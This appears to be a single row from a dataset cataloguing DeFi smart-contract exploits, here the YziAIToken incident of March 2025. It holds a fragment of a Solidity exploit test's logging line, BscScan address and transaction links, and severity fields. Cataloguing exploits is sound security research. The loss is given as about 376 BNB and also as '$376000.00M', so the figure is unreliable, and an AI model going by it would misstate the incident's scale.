emit log_named_decimal_uint("BNB balance after attack", attacker.b... | true | ~ 376 BNB | https://bscscan.com/address/0x63fc3ff98de8d5ca900e68e6c6f41a7ca949c453 | https://bscscan.com/address/0x7fdff64bf87bad52e6430bda30239bd182389ee3 | https://bscscan.com/tx/0x4821392c0b27a4acc952ff51f07ed5dc74d4b67025c57232dae44e4fef1f30e8 | https://x.com/TenArmorAlert/status/1905528525785805027 | $376000.00M | 7.22 | medium | YziAIToken Exploit (2025-03) | true | true | true | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.